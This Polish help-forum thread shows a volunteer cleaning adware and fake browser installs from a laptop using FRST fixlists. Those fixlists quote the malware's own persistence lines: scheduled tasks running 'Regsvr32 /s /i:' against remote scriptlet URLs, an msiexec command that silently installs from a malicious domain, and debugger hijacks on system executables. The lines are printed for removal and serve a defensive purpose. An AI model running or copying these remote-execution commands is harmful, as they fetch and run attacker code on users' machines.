cossack Opublikowano 13 Maja 2017 Zgłoś Udostępnij Opublikowano 13 Maja 2017 Witam,widzę że mój temat nie jest odosobniony na tym forum. Był chyba jakiś wysyp tych wirusów. Do rzeczy - otóż przeglądarki internetowe mojej dziewczyny: FireFox i Chrome zostały zawirusowane. Dodatkowo na pulpicie zainstalowały się dwie aplikacje: big farm oraz big bang empire. Według jej wersji, odwiedzając normalne strony internetowe przeglądarka nagle zwariowała. A na dodatek zauważyłem, że nie ma na laptopie antywirusa...zainstalowałem eset, przeskanowałem, ale nic nie pomogło.W załączniku przesyłam wymagane logi. Jeżeli nie macie nic przeciwko, to dołączyłbym później logi z własnego laptopa. Wydaje mi się, że jest czysty, ale używamy z dziewczyną wspólnych dysków przenośnych itp. Wolałbym mieć pewność. W każdym razie z góry dziękuję za pomoc. Już raz uratowaliście mi cztery litery z zainfekowanym pendrive Pozdrawiam! Shortcut.txt Addition.txt FRST.txt GMER.txt Odnośnik do komentarza
cossack Opublikowano 13 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 13 Maja 2017 Tak jak wspominałem, dodaje jeszcze logi z mojego laptopa.Pozdrawiam Addition.txt FRST.txt GMER.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 22 Maja 2017 Zgłoś Udostępnij Opublikowano 22 Maja 2017 Proszę o nowy zestaw raportów i przepraszam za opróżniania. Odnośnik do komentarza
cossack Opublikowano 22 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 22 Maja 2017 Nie ma problemu W załączniku logi z zainfekowanego laptopa. Później dodam logi ze swojego laptopa, by mieć pewność, że jest z nim wszystko w porządku. Pozdrawiam! Addition.txt FRST.txt GMER.txt Shortcut.txt Odnośnik do komentarza
cossack Opublikowano 22 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 22 Maja 2017 Raporty z drugiego laptopa. Addition2.txt FRST2.txt GMER2.txt Shortcut2.txt Odnośnik do komentarza
Miszel03 Opublikowano 23 Maja 2017 Zgłoś Udostępnij Opublikowano 23 Maja 2017 KOMPUTER 1 Dwie fałszywki: pod Google Chrome i pod Mozilla FireFox. Po za tym widać również wpisy startowe na powłoce i w Harmonogramie zadań uruchamiające różne strony. Za pomoc oczekuję, że przeczytasz lekturę na temat zabezpieczenia się pod takimi sytuacjami: Portale z oprogramowaniem / Instalatory - na co uważać. Treść lektury zweryfikuję w przyszłości sprawdzając czy ktoś z takim adresem IP / nickiem założył kolejny temat z pomocą 1. Przez panel sterowania odinstaluj: Programy typu PUP / adware: Browser-Security. Fałszywe oprogramowanie: YAC(Yet Another Cleaner!). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Users\Oli\AppData\Local\Bagsarah RemoveDirectory: C:\Users\Oli\AppData\Roaming\Bagsarah Task: {1931568F-04AF-4C2B-ADF1-BD0144CBC2B8} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll Task: {FC8FD99D-AA57-480D-9B6C-65A9DDA1F0C1} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{4BDE3553-DFE9-4C43-BF35-695B79DE0740}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{BF4DAAAD-3B1F-47FE-9568-55FE1FF1A158}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{6EBED432-3F9F-42B1-99AE-71CE5A061BEC}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Oli\AppData\Local\Firefox RemoveDirectory: C:\Users\Oli\AppData\Roaming\Firefox HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] S2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [X] 2017-05-11 19:25 - 2017-05-11 19:25 - 00000000 _____ C:\WINDOWS\SysWOW64\33 2017-05-11 19:17 - 2017-05-11 19:17 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\11 2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\00 C:\Users\Oli\Desktop\BigFarm.lnk C:\Users\Oli\Desktop\big_bang_empire.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_1750160028_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_3458257333_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_425821061_en-us.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_1377507374_en-US.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2104518279_en-US.lnk C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2525402577_en-US.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 4. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bagsarah;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. KOMPUTER 2 Brak oznak infekcji. 1. Odinstaluj: SecurityCenter (masz przecież rozwiązanie ESET). 2. Całościowo przeskanuj system za pomocą programu Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. Odnośnik do komentarza
cossack Opublikowano 23 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 23 Maja 2017 Wielkie dziękuję za szybką pomoc!Lekturę przeczytam i przypilnuję by dziewczyna przeczytała, bo to z jej laptopem są zawsze problemy Wszystko wykonałem, poza wyczyszczeniem i zabezpieczeniem chroma, gdyż został usunięty. Pozostała tylko mozilla.W załączniku wymagane raporty.Pozdrawiam! Addition.txt FRST.txt Shortcut.txt AdwCleanerS0.txt Fixlog.txt SearchReg.txt Odnośnik do komentarza
cossack Opublikowano 5 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 5 Czerwca 2017 Witam,chciałem się dowiedzieć czy według wysłanych raportów laptop jest już czysty i można z niego korzystać?Od czasu wysłanych logów laptop nie był w ogóle włączany, więc nie ma potrzeby podpinania nowych raportów.Pozdrawiam! Odnośnik do komentarza
Miszel03 Opublikowano 5 Czerwca 2017 Zgłoś Udostępnij Opublikowano 5 Czerwca 2017 KOMPUTER 1 Do wdrążenia będą tylko poprawki. Zakładam, ze Browser-Security nie został odinstalowany, bo ten jego wpis jest martwy. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah "path"="C:\Program Files (x86)\Bagsarah\ DeleteKey: HKEY_USERS\S-1-5-21-2083115291-1334581206-888238541-1001\Software\Bagsarah DeleteKey: HKEY_USERS\S-1-5-21-2083115291-1334581206-888238541-1001\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ef952496_0 ""="{2}.\\?\hdaudio#func_01&ven_10ec&dev_0270&subsys_1043124d&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\espeakertopo/00010001 \Device\HarddiskVolume1\Program Files (x86)\Bagsarah\Application\chrome.exe%b{00000000-0000-0000-0000-000000000000} FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\extensions\arthurj8283@gmail.com => not found EmptyTemp: 2. Zagrożenia wykryte przez AdwCleaner daj do kasacji (za pomocą opcji Oczyść). 3. Potraktuj martwy wpis Browser-Security na liście programów automatem od Microsoft. Kierunek wykonania: Odinstalowywanie > Browser-Security. 4. Podsumuj obecny stan systemu. KOMPUTER 2 Czy Malwarebytes wykrył jakieś zagrożenia? Jak tam wygląda sytuacja aktualnie? Odnośnik do komentarza
cossack Opublikowano 6 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 6 Czerwca 2017 Wszystko wykonane, poza Browser-Security, nie ma go na liście.W załączniku najnowsze raporty.Z drugim komputerem wszystko w porządku, nie wykryło żadnych zagrożeń.Pozdrawiam! Addition.txt FRST.txt Shortcut.txt Fixlog.txt AdwCleanerC0.txt Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się